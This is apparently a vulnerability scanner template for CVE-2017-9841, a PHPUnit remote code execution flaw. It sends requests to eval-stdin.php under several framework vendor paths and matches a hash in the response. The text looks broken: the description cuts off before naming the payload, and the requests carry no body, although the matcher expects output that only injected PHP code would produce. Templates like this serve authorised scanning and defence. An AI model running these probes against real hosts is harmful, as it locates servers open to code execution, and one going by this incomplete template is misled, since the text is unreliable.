id: CVE-2017-9841 info: name: PHPUnit - Remote Code Execution author: Random_Robbie,pikpikcu severity: critical description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html matchers-condition: and matchers: - type: word words: - "6dd70f16549456495373a337e6708865" part: body - type: status status: - 200